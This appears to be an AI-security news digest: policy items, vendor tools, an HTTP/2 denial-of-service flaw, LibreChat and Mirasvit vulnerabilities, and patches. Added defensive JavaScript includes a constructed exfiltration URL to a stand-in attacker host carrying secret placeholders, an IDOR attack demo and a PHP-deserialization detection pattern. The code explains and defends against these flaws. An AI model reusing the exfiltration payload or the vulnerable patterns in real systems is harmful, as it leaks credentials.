All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Wasmer engineers used Codex (an AI code generation tool) to build Edge.js, a JavaScript runtime that runs Node.js workloads inside WebAssembly (a low-level code format that runs in sandboxes for security and portability). What would have taken one year to build was completed in two weeks, allowing a small team to tackle a project previously only feasible at large companies.
Microsoft has released new security tools to control autonomous AI agents (software programs that can independently take actions like accessing files and running code) as companies adopt them in development workflows. The main offering is Microsoft Execution Container (MXC), a sandbox (an isolated environment that restricts what a program can do) that lets developers set boundaries on what resources and files agents can access. Microsoft also updated MDASH (a vulnerability research system using multiple AI agents to find security flaws) and introduced open-source governance tools to address risks from agents having too much autonomy.
OpenAI, the company behind ChatGPT (a conversational AI system), is facing competitive pressure as rival AI companies race to go public through IPOs (initial public offerings, where companies sell shares to the public for the first time) and raise large amounts of investment money. The article notes that OpenAI's CEO Sam Altman has scaled back earlier predictions about building superintelligence and reshaping society, and that the company has struggled to generate revenue from ads and specialized chatbots.
This document proposes a strategy for the U.S. government to create lasting institutions that oversee frontier AI (the most advanced AI systems being developed). The plan has three main parts: build a national framework on the state laws already in place, strengthen CAISI (the Center for AI Standards and Innovation, the federal organization responsible for frontier AI safety) as the main federal institution, and develop a broader government-wide plan to address national security and public safety risks from advanced AI.
OpenAI has published its public policy agenda centered on ensuring that artificial general intelligence (AGI, highly capable AI systems that can perform many tasks) benefits all of humanity through five core principles: democratization, empowerment, universal prosperity, resilience, and adaptability. The document outlines OpenAI's policy priorities, including a focus on frontier AI safety (protecting against risks from the most advanced AI models, particularly CBRN threats, meaning chemical, biological, radiological and nuclear, as well as cyber threats) and support for state and federal frameworks that emphasize transparency, safety incident reporting, and developer accountability.
The UK's Competition and Markets Authority has ruled that Google must allow website publishers to opt out of AI Search features, including AI Overviews (summaries generated by AI) and prevent their content from being used to train Google's AI models. This new rule gives publishers, especially news organizations, more control over how their content is used by AI systems.
A new vulnerability called HTTP/2 Bomb affects major web servers including NGINX, Apache, Microsoft IIS, Envoy, and Cloudflare Pingora by combining two attack techniques: a compression bomb (small HPACK-compressed header blocks, using HTTP/2's header compression scheme, that decompress into much larger header data the server has to hold in memory) and a Slowloris-style hold (a denial-of-service technique that keeps many connections open so that memory is never released). A single attacker on a home internet connection can exhaust a vulnerable server's memory and make it inaccessible within seconds.
LibreChat (a ChatGPT-like tool that connects to multiple AI providers) has a security flaw in versions up to 0.8.3 where someone with editing access to a shared agent can delete files globally, breaking the owner's separate private agents that use the same files. This is a cross-agent integrity violation, meaning one agent's access should not affect another agent's files.
LibreChat, a ChatGPT-like application supporting multiple AI providers, has a vulnerability in versions up to 0.8.3 where users with only VIEW access can retrieve admin-managed secrets (API keys and OAuth client secrets, stored encrypted but returned decrypted) through specific API endpoints, exposing credentials that should remain hidden from non-admin users. This happens because the API returns the plaintext values to anyone who can view the configuration instead of redacting them for non-owners.
LibreChat, a ChatGPT-like tool that works with multiple AI providers, has a vulnerability in versions up to 0.8.3 where it unsafely replaces environment variable placeholders (like ${VAR}) when validating user-provided server URLs. An authenticated attacker can create a malicious server configuration that tricks LibreChat into sending sensitive secrets like encryption keys and database credentials to an attacker-controlled server, compromising the entire installation without needing admin access.
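The placeholder substitution problem, as an added example that is not LibreChat's own code: a validator that expands ${VAR} references in whatever string it is given turns a user-supplied URL into a template that reads the server's environment, and the expanded URL is then used as an outbound request target. The environment values, the exportable-variable allow-list and the function names below are assumptions for illustration.

```javascript
// Added example (not LibreChat's code): why substituting ${VAR} placeholders
// in user-supplied URLs leaks secrets, and how to validate safely.
// ENV, SUBSTITUTABLE and the function names are assumptions for illustration.

// Constructed stand-in for process.env on a deployment. Not real secrets.
const ENV = {
  CREDS_KEY: "0123456789abcdef0123456789abcdef",     // constructed
  MONGO_URI: "mongodb://db-user:db-pass@db:27017/app", // constructed
  ALLOWED_HOST: "api.example.test",
};

// Vulnerable pattern: resolve every ${VAR} in whatever string is handed in,
// then "validate" the result by parsing it. An authenticated user submits
// "https://attacker.example/?k=${CREDS_KEY}" and the expanded URL, secrets
// included, becomes the fetch target.
function resolvePlaceholdersUnsafe(str, env = ENV) {
  return str.replace(/\$\{([A-Z0-9_]+)\}/g, (m, name) =>
    name in env ? env[name] : m);
}

function validateServerUrlVulnerable(userUrl) {
  const resolved = resolvePlaceholdersUnsafe(userUrl);
  new URL(resolved); // only checks that it parses
  return resolved;   // later used as the outbound request target
}

// Hardened pattern: user-controlled strings are data, never templates.
// 1. Refuse any placeholder syntax in user input outright.
// 2. Expand placeholders only in operator-owned config, and only for an
//    explicit allow-list of variables that are safe to expose (assumed list).
const SUBSTITUTABLE = new Set(["ALLOWED_HOST"]);

function validateServerUrlHardened(userUrl) {
  if (/\$\{[^}]*\}/.test(userUrl)) {
    throw new Error("placeholders are not allowed in user-provided URLs");
  }
  const u = new URL(userUrl);
  if (!["http:", "https:"].includes(u.protocol)) {
    throw new Error("unsupported scheme");
  }
  return u.href;
}

function resolveOperatorConfig(str, env = ENV) {
  return str.replace(/\$\{([A-Z0-9_]+)\}/g, (m, name) => {
    if (!SUBSTITUTABLE.has(name)) throw new Error(`variable not exportable: ${name}`);
    return env[name];
  });
}

// Run both validators against a constructed attacker payload.
function demo() {
  const payload = "https://attacker.example/collect?k=${CREDS_KEY}&db=${MONGO_URI}";
  const leaked = validateServerUrlVulnerable(payload);
  let blocked;
  try { validateServerUrlHardened(payload); blocked = false; }
  catch { blocked = true; }
  return {
    leaked,
    leaksKey: leaked.includes(ENV.CREDS_KEY),
    blocked,
    operator: resolveOperatorConfig("https://${ALLOWED_HOST}/v1"),
  };
}
```

The important design choice is the separation of trust levels: substitution runs only over strings the operator wrote, and even there only for an allow-list, so a leaked variable name is never enough to exfiltrate a secret.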
LibreChat, a ChatGPT-like application supporting multiple AI providers, has an IDOR vulnerability (insecure direct object reference, where an attacker can access or modify resources belonging to other users) in its API key management system in versions up to 0.7.6. An authenticated attacker can inject a userId parameter to overwrite another user's API keys, potentially stealing their API key configurations or blocking their service.
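The IDOR pattern described above, as an added example that is not LibreChat's own code: a key-update handler that lets a request-body `userId` override the authenticated identity, beside one that takes the target identity from the session only. The in-memory store, the provider allow-list and the handler names are assumptions for illustration.

```javascript
// Added example (not LibreChat's code): IDOR in a per-user API key store.
// The store, request shapes and function names are assumptions.

// In-memory store: userId -> { provider -> apiKey }. Constructed data.
const keyStore = new Map([
  ["alice", { openai: "sk-alice-constructed" }],
  ["mallory", {}],
]);

// Vulnerable handler: the request body is destructured into the update, so a
// caller who includes `userId` in the JSON chooses which user's row is written.
function updateKeyVulnerable(session, body) {
  const { userId = session.userId, provider, apiKey } = body;
  const row = keyStore.get(userId) ?? {};
  row[provider] = apiKey;
  keyStore.set(userId, row);
  return userId;
}

// Hardened handler: the target identity comes only from the authenticated
// session; body fields are validated one by one and `userId` is ignored.
const PROVIDERS = new Set(["openai", "anthropic"]); // assumed allow-list
function updateKeyHardened(session, body) {
  if (!session?.userId) throw new Error("unauthenticated");
  if (!PROVIDERS.has(body.provider)) throw new Error("unknown provider");
  if (typeof body.apiKey !== "string" || body.apiKey.length === 0) {
    throw new Error("invalid key");
  }
  const row = keyStore.get(session.userId) ?? {};
  row[body.provider] = body.apiKey;
  keyStore.set(session.userId, row);
  return session.userId;
}

function getKey(userId, provider) {
  return keyStore.get(userId)?.[provider];
}

// Mallory, authenticated as herself, tries to overwrite Alice's key.
function demo() {
  const mallory = { userId: "mallory" };
  const attack = { userId: "alice", provider: "openai", apiKey: "sk-mallory-owned" };

  keyStore.set("alice", { openai: "sk-alice-constructed" });
  updateKeyVulnerable(mallory, attack);
  const vulnerableResult = getKey("alice", "openai");

  keyStore.set("alice", { openai: "sk-alice-constructed" });
  const hardenedWroteTo = updateKeyHardened(mallory, attack);
  return {
    vulnerableResult,
    hardenedWroteTo,
    aliceKey: getKey("alice", "openai"),
    malloryKey: getKey("mallory", "openai"),
  };
}
```

The check to add in review is simple to state: any identifier that selects whose resource is modified must be derived from the authenticated principal, never accepted from the request body, query or path unless an explicit authorization check compares the two.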
Fix: Microsoft Execution Container (MXC) is positioned as the primary mitigation. According to the source, "MXC is a sandboxed code execution system for running untrusted code (model output, plugins, tools) on Windows, Linux, and macOS" that "provides multiple containment backends — from OS-native process sandboxes to full VMs — behind a unified JSON configuration schema and TypeScript SDK." The source states MXC is "a policy-driven execution workflow that lets developers specify what an AI agent can access, such as files, networks, resources, credentials, and then enforces those boundaries at runtime." Integration with Agent 365 will bring additional controls from Defender, Entra, Intune, and Purview to agent environments.
CSO Online
Sam Altman, CEO of OpenAI, has been invited by French President Macron to attend the G7 conference in June 2026, where AI is expected to be a major topic of discussion. OpenAI plans to focus on youth safety, frontier AI risks (particularly cyber and biological threats), and getting tech companies to make voluntary commitments to responsible AI development. This invitation is part of Macron's broader effort to attract major tech companies and investment to France's AI infrastructure.
Public marketplaces for AI skills (specialized add-ons that extend AI agent capabilities) are being flooded with malicious skills that steal passwords and data. Security companies have released skill scanners to detect these threats, but researchers found that these scanners are easy to bypass, sometimes in under an hour, because they rely on static detection methods that attackers can repeatedly modify to evade.
AI systems, particularly agentic AI (autonomous software that makes decisions and takes actions with minimal human oversight), are creating new security risks in enterprises by operating across systems at machine speed and collapsing traditional security boundaries. Security leaders now have board-level urgency and increased budgets to address these threats, though organizations still lack reliable ways to monitor what these AI agents are accessing and whether their actions align with company policies.
Fix: OpenAI supports state-level legislative efforts such as California SB 53, the New York RAISE Act, and Illinois SB 315, which emphasize transparency, public reporting around catastrophic-risk evaluations and safety incidents, whistleblower protections, and enforceable accountability for developers. OpenAI also supports Congressional action to establish a comprehensive federal framework that leverages state frontier safety laws, strengthens the Center for AI Standards and Innovation (CAISI) as the primary federal institution for frontier AI safety, and mobilizes a broader resilience plan across government to address national security and public safety challenges.
OpenAI Blog
Google is rolling out a new Android security feature called 'fake call detection' that protects users from AI deepfake scam calls in which scammers impersonate someone's contacts. When a contact places a call, their device sends an encrypted confirmation signal; if the recipient's phone receives a call from that contact's number without the signal, it pings the contact's actual phone to check whether it is really calling, and warns the user to hang up if the contact's device confirms it is not.
Fix: Google's mitigation is built into the new 'fake call detection' feature, which is rolling out globally this month to Android 12 and later devices (starting with Pixel devices) and enabled by default. The feature requires Phone by Google, Contacts, and Google Messages (with RCS, or Rich Communication Services, enabled) to be installed. Google also stated: 'If your device uses a different app, you can install Phone by Google from the Play Store and set it as your default phone app to help protect yourself from fake calls.'
BleepingComputer
Fix: NGINX: upgrade to version 1.29.8 or later, which adds the max_headers directive with a default of 1000; alternatively, disable HTTP/2 with http2 off;.
Apache HTTPD: upgrade mod_http2 to version 2.0.41 or later; alternatively, set Protocols http/1.1 to disable HTTP/2.
Microsoft IIS, Envoy, and Cloudflare Pingora: no patch available as of the article's writing date.
The Hacker News
Debapt is a system that uses multiple AI agents (independent AI programs that work together) debating with each other to build profiles of APT (advanced persistent threat, a sophisticated type of cyberattack) adversaries by analyzing cyber threat intelligence (information about security threats). The system uses an ontology (a formal structure that defines how concepts relate to each other) to organize this debate process. This research proposes a new way to understand and track advanced attackers by having AI agents discuss and reason through threat data together.
Anthropic expanded its Project Glasswing (an AI-based vulnerability hunting initiative that finds security bugs in software) to 150 more companies, especially those in critical infrastructure like power and healthcare. However, security experts warn this creates a bottleneck problem: if AI finds vulnerabilities 10 or more times faster than before, companies may not be able to validate, prioritize, patch, and deploy fixes quickly enough, potentially overwhelming security teams rather than actually improving defense.
This research paper presents a method for detecting deepfakes (synthetic videos or images created by AI to look realistic) using a dual-mode Swin Transformer, which is a type of neural network architecture. The approach uses multi-scale feature learning (analyzing visual details at different zoom levels) and local ambiguity mitigation (reducing confusion in uncertain areas) to improve detection accuracy. This is a technical contribution to security research, not a response to an existing vulnerability or security incident.
Mirasvit Full Page Cache Warmer contains a deserialization vulnerability (attacker-controlled data is unserialized into PHP objects, whose magic methods then run attacker-chosen code), allowing attackers without authentication to run arbitrary commands on affected systems by sending a malicious serialized PHP object through the CacheWarmer cookie. This vulnerability is currently being exploited in active attacks.
Fix: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. See vendor changelog at https://mirasvit.com/package/changelog/?package=mirasvit/module-cache-warmer for available patches.
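For teams that cannot patch immediately, a hunting check over request logs is the practical complement to the advice above. The following is an added example, not code from CISA or Mirasvit: it flags requests whose CacheWarmer cookie carries a serialized PHP object. The log format and log lines are constructed, and whether real payloads arrive raw, URL-encoded or base64-encoded is an assumption, so all three forms are checked.

```javascript
// Added example (not CISA's or the vendor's code): spot a serialized PHP object
// in the CacheWarmer cookie. Log format and sample lines are constructed;
// checking URL-decoded and base64-decoded forms is an assumption.

// PHP serialized object: O:<len>:"<Class>":<n>:{...}; the Serializable form
// is C:<len>:"<Class>":<len>:{...}. Class names may contain namespace '\'.
const PHP_OBJECT = /(?:^|[;{])[OC]:\d+:"([A-Za-z0-9_\\]+)":\d+:\{/;

// Produce the raw value plus its URL-decoded and base64-decoded variants.
function decodeCandidates(value) {
  const out = [value];
  try { out.push(decodeURIComponent(value)); } catch {}
  for (const v of [...out]) {
    if (/^[A-Za-z0-9+/=]+$/.test(v) && v.length % 4 === 0) {
      out.push(Buffer.from(v, "base64").toString("latin1"));
    }
  }
  return out;
}

// Returns the serialized class name if the CacheWarmer cookie looks like a
// PHP object, otherwise null.
function inspectCacheWarmerCookie(cookieHeader) {
  const m = /(?:^|;\s*)CacheWarmer=([^;]*)/.exec(cookieHeader ?? "");
  if (!m) return null;
  for (const candidate of decodeCandidates(m[1])) {
    const hit = PHP_OBJECT.exec(candidate);
    if (hit) return hit[1];
  }
  return null;
}

// Constructed log format: <ip> <method> <path> cookie="<Cookie header>"
function scanLogLines(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /^(\S+) (\S+) (\S+) cookie="([^"]*)"$/.exec(line);
    if (!m) continue;
    const className = inspectCacheWarmerCookie(m[4]);
    if (className) findings.push({ ip: m[1], path: m[3], className });
  }
  return findings;
}

// Constructed sample lines: one URL-encoded payload, one benign cookie,
// one base64-encoded payload with a namespaced class name.
const SAMPLE_LOG = [
  '203.0.113.7 GET /index.php cookie="PHPSESSID=abc; CacheWarmer=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3B%7D"',
  '198.51.100.2 GET / cookie="CacheWarmer=warm"',
  '203.0.113.9 GET /catalog cookie="CacheWarmer=' +
    Buffer.from('O:18:"Some\\Vendor\\Gadget":0:{}').toString("base64") + '"',
];
```

The class name is worth keeping in the finding: it tells the responder which gadget chain the attacker is attempting, which helps decide whether the application's installed libraries made the attempt viable.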
CISA Known Exploited Vulnerabilities
Palo Alto Networks CEO Nikesh Arora reported a surge in customer meetings, with the company fielding roughly 1,200 inquiries in recent weeks from organizations seeking guidance on AI security risks. The article notes that AI-powered attacks are becoming more sophisticated, making cybersecurity more important for companies, and that earlier investor concerns about AI disrupting cybersecurity companies appear to have been overblown.
Fix (LibreChat cross-agent file deletion, above): Version 0.8.4 contains a patch.
NVD/CVE Database
Fix (LibreChat secret exposure to VIEW-level users, above): Version 0.8.4 contains a patch. The source also recommends these additional measures: never return decrypted admin-managed secrets to non-owners; redact apiKey.key and oauth.client_secret from all API responses; consider returning only boolean presence indicators for secrets (true/false flags showing whether a secret exists, similar to the auth-values route pattern); and, if owners need to edit configs without re-entering secrets, preserve the secrets server-side and return placeholders instead of plaintext values.
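The recommendations above, as an added example that is not LibreChat's own code: a serializer that gives non-owners boolean presence flags, gives owners a placeholder, and treats the placeholder on a later edit as "keep the stored value", plus an outbound guard that fails closed if a raw secret ever reaches a response. The field names apiKey.key and oauth.client_secret follow the fix text; the record shape, the placeholder token and the role check are assumptions for illustration.

```javascript
// Added example (not LibreChat's code): redacting admin-managed secrets in API
// responses. Record shape, placeholder token and roles are assumptions.

const SECRET_PLACEHOLDER = "__PRESERVED__"; // assumed sentinel for owners

// Constructed stored record (all values made up).
const storedConfig = {
  id: "cfg-1",
  ownerId: "admin",
  url: "https://mcp.example.test",
  apiKey: { key: "sk-constructed-secret", header: "Authorization" },
  oauth: { client_id: "client-123", client_secret: "oauth-constructed-secret" },
};

// Non-owners get presence flags only; owners get a placeholder so the form
// can be re-submitted without ever round-tripping the plaintext secret.
function serializeConfig(cfg, requester) {
  const isOwner = requester.userId === cfg.ownerId;
  const out = { id: cfg.id, url: cfg.url };
  if (cfg.apiKey) {
    out.apiKey = {
      header: cfg.apiKey.header,
      hasKey: Boolean(cfg.apiKey.key),
      ...(isOwner ? { key: SECRET_PLACEHOLDER } : {}),
    };
  }
  if (cfg.oauth) {
    out.oauth = {
      client_id: cfg.oauth.client_id,
      hasClientSecret: Boolean(cfg.oauth.client_secret),
      ...(isOwner ? { client_secret: SECRET_PLACEHOLDER } : {}),
    };
  }
  return out;
}

// Owner edit: a secret field equal to the placeholder means "keep stored value";
// any other string replaces it. Returns a new record, leaving the stored one untouched.
function applyOwnerEdit(stored, edit) {
  const next = JSON.parse(JSON.stringify(stored));
  if (typeof edit.url === "string") next.url = edit.url;
  const k = edit.apiKey?.key;
  if (typeof k === "string" && k !== SECRET_PLACEHOLDER) next.apiKey.key = k;
  const s = edit.oauth?.client_secret;
  if (typeof s === "string" && s !== SECRET_PLACEHOLDER) next.oauth.client_secret = s;
  return next;
}

// Fail-closed guard for every outgoing payload: true if any stored secret
// appears verbatim in the serialized response.
function containsSecret(payload, cfg) {
  const text = JSON.stringify(payload);
  return [cfg.apiKey?.key, cfg.oauth?.client_secret]
    .some((v) => typeof v === "string" && v.length > 0 && text.includes(v));
}
```

Wiring containsSecret into a response middleware turns the redaction rule into an invariant that a future endpoint cannot silently violate.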
NVD/CVE Database
Fix (LibreChat ${VAR} placeholder substitution, above): This is patched in version 0.8.4-rc1.
NVD/CVE Database
Fix (LibreChat API key IDOR, above): This vulnerability is patched in version 0.8.3-rc1.
NVD/CVE Database